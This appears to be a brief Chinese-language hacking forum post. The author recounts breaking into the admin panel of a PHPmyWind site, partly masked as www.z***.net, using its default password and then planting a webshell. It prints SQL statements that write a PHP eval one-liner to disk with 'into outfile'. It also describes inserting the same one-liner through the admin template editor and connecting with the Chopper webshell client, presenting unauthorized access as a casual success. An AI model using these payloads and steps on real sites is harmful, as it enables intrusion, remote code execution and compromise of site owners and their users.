PHPmywind 后台拿shell
网上好像有好多的教程的 用数据库执行Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'F:/APMServ5.2.6/www/phpMyAdmin/eval.php';
Drop TABLE IF EXISTS a;语句 然后还原成php文件来拿shell
测试站点 www.z***.net
程序:phpmy wind
默认密码直接进来后台了 昨晚其实进来了 朋友在身边 不让玩 只好放到今天来拿了
看了网上的一些方法 数据库执行的最多 但是这网站装了360网站卫士 各种的上传 执行语句都不行 疍疼..
发现后台有个默认模板管理
打开 随便找了个编辑 然后插入一句话 <?php @eval($_POST[cmd])?>
打开菜刀果断连之 ol 搞定!